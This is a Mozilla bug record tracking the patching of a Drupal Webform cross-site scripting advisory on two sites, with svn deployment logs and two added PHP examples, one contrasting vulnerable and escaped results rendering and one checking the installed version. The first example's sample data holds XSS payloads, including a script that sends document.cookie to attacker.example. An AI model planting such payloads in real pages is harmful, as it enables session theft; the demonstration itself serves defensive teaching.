Bug 496182
Opened 15 years ago
Closed 15 years ago
SA-CONTRIB-2009-032 - Webform - Cross-site scripting
Categories: Infrastructure & Operations Graveyard :: WebOps: Other, task
Status: RESOLVED FIXED
People: Reporter: abuchanan, Assigned: oremj
Keywords: wsec-xss
* Advisory ID: DRUPAL-SA-CONTRIB-2009-032
* Project: Webform (third-party module)
* Versions: 5.x, 6.x
* Date: 2009-June-03
* Security risk: Moderately critical
* Exploitable from: Remote
* Vulnerability: Cross-site scripting

-------- DESCRIPTION ---------------------------------------------------------

The Webform module provides a node type which is typically used to enable site visitors to fill in questionnaires, contact or request/registration forms, surveys, polls, or other forms on a Drupal site.

When displaying the results of Webform submissions, the module does not properly filter user-entered data, leading to a cross-site scripting [1] (XSS) vulnerability on sites with a specific configuration of input formats that would normally be safe. Such an attack carried out against a sufficiently privileged user may lead a malicious user to gain administrator access to the site.

-------- VERSIONS AFFECTED ---------------------------------------------------

* Versions of Webform for Drupal 5.x prior to 5.x-2.7
* Versions of Webform for Drupal 6.x prior to 6.x-2.7

Drupal core is not affected. If you do not use the contributed Webform module, there is nothing you need to do.

-------- SOLUTION ------------------------------------------------------------

Install the latest version:

* If you use Webform for Drupal 5.x, upgrade to Webform 5.x-2.7 [2].
* If you use Webform for Drupal 6.x, upgrade to Webform 6.x-2.7 [3].

This affects SFx and QMO.

See also the Webform project page [4].

-------- REPORTED BY ---------------------------------------------------------

David Rothstein [5]

-------- FIXED BY ------------------------------------------------------------

Nathan Haug (quicksketch [6]), and David Rothstein [7] of the Drupal Security Team [8]

-------- CONTACT -------------------------------------------------------------

The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/481260
[3] http://drupal.org/node/481258
[4] http://drupal.org/project/webform
[5] http://drupal.org/user/124982
[6] http://drupal.org/user/35821
[7] http://drupal.org/user/124982
[8] http://drupal.org/security-team

_______________________________________________
Security-news mailing list
Security-news@drupal.org
http://lists.drupal.org/listinfo/security-news
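The bug class the advisory describes, as an added illustration that is not the Webform module's code and not the fix that shipped in 2.7: a value a visitor typed into a form is stored and later rendered into the results page that a privileged user views. The sample submissions, the two renderer functions and the tag check below are constructed for this example; check_plain() is Drupal's HTML-escaping helper, given a stand-in definition that does the same escaping so the script also runs outside Drupal.

```php
<?php
// Added illustration of the bug class in SA-CONTRIB-2009-032 (stored XSS via
// a submission results page). Not the Webform module's code and not its fix:
// the sample submissions, both renderers and the tag check are constructed
// for this example. check_plain() is Drupal's HTML-escaping helper; the
// stand-in below does the same escaping so the script runs outside Drupal.

if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
  }
}

// Constructed submissions, as an anonymous visitor could post them. Storing
// them is harmless; the values become dangerous only when somebody with
// access to the results page has them rendered into their browser.
$submissions = array(
  array('sid' => 1, 'name' => 'Alice', 'comment' => 'Great build, thanks!'),
  array(
    'sid' => 2,
    'name' => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    'comment' => '<img src=x onerror="alert(document.domain)">',
  ),
);

// Vulnerable pattern: the stored string is trusted and concatenated into the
// page. Whoever views the results (a sufficiently privileged user, per the
// advisory) executes the payload in the site's origin.
function results_table_vulnerable(array $rows) {
  $out = "<table>\n";
  foreach ($rows as $row) {
    $out .= "  <tr><td>{$row['sid']}</td><td>{$row['name']}</td><td>{$row['comment']}</td></tr>\n";
  }
  return $out . "</table>\n";
}

// Hardened pattern: every visitor-supplied value is escaped at the point it
// is placed into HTML. Submission values are not editor-authored body text,
// so they should not depend on a site-configurable input format for their
// safety; check_plain() escapes regardless of site configuration.
function results_table_safe(array $rows) {
  $out = "<table>\n";
  foreach ($rows as $row) {
    $out .= '  <tr><td>' . (int) $row['sid'] . '</td>'
          . '<td>' . check_plain($row['name']) . '</td>'
          . '<td>' . check_plain($row['comment']) . "</td></tr>\n";
  }
  return $out . "</table>\n";
}

// Regression check for a renderer: the only raw tags allowed in its output
// are the ones the renderer itself emits. Escaped input appears as &lt;...
// and therefore never matches.
function only_expected_tags($html, array $allowed = array('table', 'tr', 'td')) {
  preg_match_all('/<\/?([a-z][a-z0-9]*)/i', $html, $m);
  foreach ($m[1] as $tag) {
    if (!in_array(strtolower($tag), $allowed, TRUE)) {
      return FALSE;
    }
  }
  return TRUE;
}

foreach (array('vulnerable' => 'results_table_vulnerable', 'safe' => 'results_table_safe') as $label => $renderer) {
  $html = $renderer($submissions);
  echo "== $label renderer ==\n", $html;
  echo "only expected tags: ", only_expected_tags($html) ? 'yes' : 'NO, raw markup from a submission survived', "\n\n";
}
```

Run it with the PHP CLI (php results.php). The vulnerable renderer fails the tag check because the second submission's script and img tags reach the page intact; the hardened renderer passes because every visitor value was escaped where it was inserted.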
Comment 1•15 years ago (Reporter)
r27034 and r27035 update webform on QMO and SFx Paul, Tomcat, could you please check webform on QMO stage and give the go ahead to tag for production?
Comment 2•15 years ago
Confirmed that webform on QMO stage is up to version 6.x-2.7.
Comment 3•15 years ago
Alex, did you commit on production too?
Comment 4•15 years ago (Reporter)
not yet, tagging for production now
Comment 5•15 years ago (Reporter)
Over to IT to svn up production and run update.php on QMO and SFx, please. Thanks everyone.

QMO:
Sending tags/production/sites/all/modules/webform
Sending tags/production/sites/all/modules/webform/components/date.inc
Sending tags/production/sites/all/modules/webform/components/email.inc
Sending tags/production/sites/all/modules/webform/components/fieldset.inc
Sending tags/production/sites/all/modules/webform/components/file.inc
Sending tags/production/sites/all/modules/webform/components/grid.inc
Sending tags/production/sites/all/modules/webform/components/hidden.inc
Sending tags/production/sites/all/modules/webform/components/markup.inc
Sending tags/production/sites/all/modules/webform/components/pagebreak.inc
Sending tags/production/sites/all/modules/webform/components/select.inc
Sending tags/production/sites/all/modules/webform/components/textarea.inc
Sending tags/production/sites/all/modules/webform/components/textfield.inc
Sending tags/production/sites/all/modules/webform/components/time.inc
Sending tags/production/sites/all/modules/webform/tests/components.test
Sending tags/production/sites/all/modules/webform/tests/permissions.test
Sending tags/production/sites/all/modules/webform/tests/submission.test
Sending tags/production/sites/all/modules/webform/tests/webform.test
Sending tags/production/sites/all/modules/webform/translations/de.po
Sending tags/production/sites/all/modules/webform/translations/el.po
Sending tags/production/sites/all/modules/webform/translations/nl.po
Sending tags/production/sites/all/modules/webform/translations/webform.pot
Sending tags/production/sites/all/modules/webform/webform-confirmation.tpl.php
Sending tags/production/sites/all/modules/webform/webform-form.tpl.php
Sending tags/production/sites/all/modules/webform/webform-mail.tpl.php
Sending tags/production/sites/all/modules/webform/webform.css
Sending tags/production/sites/all/modules/webform/webform.info
Sending tags/production/sites/all/modules/webform/webform.install
Sending tags/production/sites/all/modules/webform/webform.js
Sending tags/production/sites/all/modules/webform/webform.module
Sending tags/production/sites/all/modules/webform/webform_components.inc
Sending tags/production/sites/all/modules/webform/webform_export.inc
Sending tags/production/sites/all/modules/webform/webform_report.inc
Sending tags/production/sites/all/modules/webform/webform_submissions.inc
Transmitting file data ................................
Committed revision 27038.

SFX:
Sending tags/production/sites/all/modules/webform
Sending tags/production/sites/all/modules/webform/THEMING.txt
Sending tags/production/sites/all/modules/webform/components/date.inc
Sending tags/production/sites/all/modules/webform/components/email.inc
Sending tags/production/sites/all/modules/webform/components/fieldset.inc
Sending tags/production/sites/all/modules/webform/components/file.inc
Sending tags/production/sites/all/modules/webform/components/grid.inc
Sending tags/production/sites/all/modules/webform/components/hidden.inc
Sending tags/production/sites/all/modules/webform/components/markup.inc
Sending tags/production/sites/all/modules/webform/components/pagebreak.inc
Sending tags/production/sites/all/modules/webform/components/select.inc
Sending tags/production/sites/all/modules/webform/components/textarea.inc
Sending tags/production/sites/all/modules/webform/components/textfield.inc
Sending tags/production/sites/all/modules/webform/components/time.inc
Sending tags/production/sites/all/modules/webform/po/da.po
Sending tags/production/sites/all/modules/webform/po/de.po
Sending tags/production/sites/all/modules/webform/po/el.po
Sending tags/production/sites/all/modules/webform/po/es.po
Sending tags/production/sites/all/modules/webform/po/fr.po
Sending tags/production/sites/all/modules/webform/po/he.po
Sending tags/production/sites/all/modules/webform/po/hu.po
Sending tags/production/sites/all/modules/webform/po/it.po
Sending tags/production/sites/all/modules/webform/po/nl.po
Sending tags/production/sites/all/modules/webform/po/ru.po
Sending tags/production/sites/all/modules/webform/po/sv.po
Sending tags/production/sites/all/modules/webform/po/webform.pot
Sending tags/production/sites/all/modules/webform/webform.css
Sending tags/production/sites/all/modules/webform/webform.info
Sending tags/production/sites/all/modules/webform/webform.install
Sending tags/production/sites/all/modules/webform/webform.module
Sending tags/production/sites/all/modules/webform/webform_components.inc
Sending tags/production/sites/all/modules/webform/webform_report.inc
Sending tags/production/sites/all/modules/webform/webform_submissions.inc
Transmitting file data ................................
Committed revision 27039.
Assignee: nobody → server-ops
Component: Other → Server Operations: Web Content Push
Product: Websites → mozilla.org
QA Contact: other → mrz
Version: unspecified → other
Comment 6•15 years ago
Thanks Alex!
Updated•15 years ago (Assignee)
Assignee: server-ops → oremj
Comment 8•15 years ago (Reporter)
bug 496378 tags sfx 3.0.1 for production. This bug and that bug can be launched at the same time.
Comment 9•15 years ago (Reporter)
making this critical just to make sure it's on the radar for today
Severity: normal → critical
Comment 10•15 years ago (Assignee)
quality.mozilla.org]# svn up
U sites/all/themes/qmo/qmo.js
U sites/all/themes/qmo/css/mozqa.css
A sites/all/modules/webform/translations/cs.po
U sites/all/modules/webform/translations/webform.pot
U sites/all/modules/webform/translations/de.po
U sites/all/modules/webform/translations/nl.po
A sites/all/modules/webform/translations/ja.po
A sites/all/modules/webform/translations/sk.po
U sites/all/modules/webform/translations/el.po
U sites/all/modules/webform/webform.module
U sites/all/modules/webform/components/email.inc
U sites/all/modules/webform/components/textfield.inc
U sites/all/modules/webform/components/hidden.inc
U sites/all/modules/webform/components/date.inc
U sites/all/modules/webform/components/textarea.inc
U sites/all/modules/webform/components/time.inc
U sites/all/modules/webform/components/fieldset.inc
U sites/all/modules/webform/components/file.inc
U sites/all/modules/webform/components/markup.inc
U sites/all/modules/webform/components/select.inc
U sites/all/modules/webform/components/pagebreak.inc
U sites/all/modules/webform/components/grid.inc
U sites/all/modules/webform/webform-form.tpl.php
U sites/all/modules/webform/webform.css
U sites/all/modules/webform/webform.info
U sites/all/modules/webform/tests/webform.test
U sites/all/modules/webform/tests/components.test
U sites/all/modules/webform/tests/permissions.test
U sites/all/modules/webform/tests/submission.test
U sites/all/modules/webform/webform_report.inc
U sites/all/modules/webform/webform-mail.tpl.php
U sites/all/modules/webform/webform.install
U sites/all/modules/webform/webform_submissions.inc
U sites/all/modules/webform/webform_export.inc
U sites/all/modules/webform/webform-confirmation.tpl.php
U sites/all/modules/webform/webform.js
A sites/all/modules/webform/po
A sites/all/modules/webform/po/da.po
A sites/all/modules/webform/po/cs.po
A sites/all/modules/webform/po/webform.pot
A sites/all/modules/webform/po/ru.po
A sites/all/modules/webform/po/es.po
A sites/all/modules/webform/po/fr.po
A sites/all/modules/webform/po/de.po
A sites/all/modules/webform/po/sv.po
A sites/all/modules/webform/po/nl.po
A sites/all/modules/webform/po/he.po
A sites/all/modules/webform/po/hu.po
A sites/all/modules/webform/po/it.po
A sites/all/modules/webform/po/sk.po
A sites/all/modules/webform/po/el.po
U sites/all/modules/webform/webform_components.inc
U sites/all/modules/webform
Updated to revision 27162.

www.spreadfirefox.com]# svn up
U sites/all/themes/sfxBB/page-footer.tpl.php
A sites/all/themes/sfxBB/img/sumo-icon.png
U sites/all/themes/sfxBB/page-affiliates-get_button.tpl.php
A sites/all/themes/sfxBB/page-contact-us.tpl.php
U sites/all/themes/sfxBB/page-header.tpl.php
U sites/all/themes/sfxBB/css/main.css
U sites/all/themes/sfxBB
U sites/all/modules/sfx_photostream/sfx_photostream.module
U sites/all/modules/sfx_photostream
U sites/all/modules/sfx_affiliates/sfx_affiliates.module
U sites/all/modules/sfx_affiliates
A sites/all/modules/sfx/tests
A sites/all/modules/sfx/tests/sfx_affiliates.test
U sites/all/modules/sfx/sfx.module
U sites/all/modules/sfx
U sites/all/modules/webform/components/email.inc
U sites/all/modules/webform/components/textfield.inc
U sites/all/modules/webform/components/hidden.inc
U sites/all/modules/webform/components/date.inc
U sites/all/modules/webform/components/textarea.inc
U sites/all/modules/webform/components/time.inc
U sites/all/modules/webform/components/fieldset.inc
U sites/all/modules/webform/components/file.inc
U sites/all/modules/webform/components/markup.inc
U sites/all/modules/webform/components/select.inc
U sites/all/modules/webform/components/pagebreak.inc
U sites/all/modules/webform/components/grid.inc
U sites/all/modules/webform/webform.module
U sites/all/modules/webform/webform.css
U sites/all/modules/webform/webform.info
U sites/all/modules/webform/webform_report.inc
U sites/all/modules/webform/webform.install
U sites/all/modules/webform/webform_submissions.inc
U sites/all/modules/webform/THEMING.txt
A sites/all/modules/webform/webform_export.inc
U sites/all/modules/webform/po/da.po
A sites/all/modules/webform/po/cs.po
U sites/all/modules/webform/po/webform.pot
U sites/all/modules/webform/po/ru.po
U sites/all/modules/webform/po/es.po
U sites/all/modules/webform/po/fr.po
U sites/all/modules/webform/po/de.po
U sites/all/modules/webform/po/sv.po
U sites/all/modules/webform/po/nl.po
U sites/all/modules/webform/po/he.po
U sites/all/modules/webform/po/hu.po
U sites/all/modules/webform/po/it.po
A sites/all/modules/webform/po/sk.po
U sites/all/modules/webform/po/el.po
U sites/all/modules/webform/webform_components.inc
U sites/all/modules/webform
U sites/all/modules/contact_us/contact_us.module
U sites/all/modules/contact_us
Updated to revision 27163.
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
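The verification step that comment 2 did by hand on stage (confirming the deployed Webform reports the fixed release), as an added example that is not part of this bug, of Mozilla's deployment tooling or of the Webform module. It reads the version line that drupal.org's packaging script writes into webform.info and compares it against the fixed release for that core branch (5.x-2.7 or 6.x-2.7, from the advisory). The two .info contents and the site labels are constructed, and the function names are this example's own.

```php
<?php
// Added example: confirm that a deployed copy of Webform is at or above the
// release that fixes SA-CONTRIB-2009-032 (5.x-2.7 for Drupal 5, 6.x-2.7 for
// Drupal 6). Not part of the bug or the Webform module; the .info contents,
// site labels and function names are constructed for this example.

// Fixed releases per Drupal core branch, taken from the advisory.
$webform_fixed_release = array(5 => '5.x-2.7', 6 => '6.x-2.7');

// Contrib release strings look like "6.x-2.7": core branch, module major,
// module minor. Returns array(core, major, minor), or NULL for anything else
// (a "6.x-2.x-dev" snapshot, a missing line, a repository checkout with no
// version line at all).
function webform_parse_release($version) {
  if (!preg_match('/^(\d+)\.x-(\d+)\.(\d+)$/', trim((string) $version), $m)) {
    return NULL;
  }
  return array((int) $m[1], (int) $m[2], (int) $m[3]);
}

// Pull "version = ..." out of a .info file's text. The line is added by the
// drupal.org packaging script when a release tarball is built; a raw
// CVS/svn checkout of the module does not carry it.
function webform_info_version($info_text) {
  if (preg_match('/^\s*version\s*=\s*"?([^"\r\n]*)"?\s*$/m', $info_text, $m)) {
    return trim($m[1]);
  }
  return NULL;
}

// TRUE only when the .info file proves a fixed release. Unknown, dev or
// unparseable versions return FALSE so that a human looks at them instead
// of the check silently passing.
function webform_is_fixed($info_text, array $fixed_by_core) {
  $have = webform_parse_release(webform_info_version($info_text));
  if ($have === NULL || !isset($fixed_by_core[$have[0]])) {
    return FALSE;
  }
  $need = webform_parse_release($fixed_by_core[$have[0]]);
  if ($have[1] !== $need[1]) {
    return $have[1] > $need[1];
  }
  return $have[2] >= $need[2];
}

// Constructed .info contents standing in for sites/all/modules/webform/webform.info
// on three sites: one updated, one still on the previous release, one running
// from a checkout that has no version line.
$sites = array(
  'updated-site'   => "name = Webform\ncore = 6.x\nversion = \"6.x-2.7\"\nproject = \"webform\"\n",
  'lagging-site'   => "name = Webform\ncore = 6.x\nversion = \"6.x-2.6\"\nproject = \"webform\"\n",
  'checkout-site'  => "name = Webform\ncore = 6.x\n",
);

foreach ($sites as $site => $info_text) {
  $version = webform_info_version($info_text);
  $ok = webform_is_fixed($info_text, $webform_fixed_release);
  printf("%-16s webform %-10s %s\n", $site, $version === NULL ? '(none)' : $version, $ok ? 'OK' : 'NEEDS ATTENTION');
}
```

In practice the loop would read each site's sites/all/modules/webform/webform.info from disk (or over ssh) after the svn up, and the check belongs after update.php has been run, since the version line only says which code is on disk, not whether the update hooks completed.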
Comment 11•11 years ago
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Updated•11 years ago
Component: Server Operations: Web Operations → WebOps: Other
Product: mozilla.org → Infrastructure & Operations
Updated•5 years ago
Product: Infrastructure & Operations → Infrastructure & Operations Graveyard